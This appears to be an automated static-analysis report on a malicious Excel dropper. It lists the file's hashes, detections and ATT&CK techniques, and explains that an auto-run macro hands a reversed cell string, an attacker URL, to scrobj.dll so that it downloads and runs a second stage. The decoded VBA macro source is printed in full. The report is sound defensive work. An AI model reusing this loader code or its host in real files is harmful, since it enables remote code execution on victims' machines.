Xls.Dropper.Agent-8934757-0 — Office (OLE) malware analysis

Static analysis result for SHA-256 e4e5c009743f614b…

MALICIOUS

Office (OLE)

Size: 138.0 KB · Created: 2020-06-29 03:16:30 · Authoring application: Microsoft Excel · First seen: 2020-09-15
MD5: 2b75670314f97f95d793b15a3c0ce009
SHA-1: 121f3488a3938797e447355cf19a4939621cb79b
SHA-256: e4e5c009743f614b174429e1fe812966cd7f0a120b94942ced1f247eada4c987
Risk score: 122

Malware Insights

Xls.Dropper.Agent-8934757-0 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Excel document containing a Workbook_Open VBA macro that runs automatically when the workbook is opened. This macro calls two subroutines, fffff and zzz. The fffff subroutine reverses the string stored in cell X600 and writes the result to X700. The zzz subroutine then passes the string in Sheet1.Range("X700").Value as the command line to the DllInstall export of scrobj.dll. That string, reconstructed from the document body, is http://62.138.8.182/wwwwx, so the macro hands the URL to scrobj.dll for retrieval and execution. This indicates the file is a macro-based dropper designed to download and execute a second-stage payload.

Heuristics 4

  • ClamAV: Xls.Dropper.Agent-8934757-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-8934757-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs found, with the channel through which each was reached:
    • http://62.138.8.182/wwwwx · In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# · In document text (OLE body)
    • http://ns.adobe.com/exif/1.0/ · In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas · Kind: vba-macro · Source: oletools.olevba.extract_macros (decoded VBA source) · Size: 1336 bytes
SHA-256: 8579ea3d1690559cab8b535c343354ce4e26c3f5e51d282fe49c9bfb6d250189
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare PtrSafe Function DllInstall Lib "scrobj.dll" (ByVal DllInstall As Boolean, ByRef pszCmdLine As Any) As Long
'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox

Sub fffff()
'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox
Range("X700").Value = StrReverse(Range("X600"))
End Sub
Sub zzz()
'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox
DllInstall False, ByVal StrPtr(Sheet1.Range("X700").Value)
End Sub

Private Sub Workbook_Open()
'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox
fffff
zzz
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True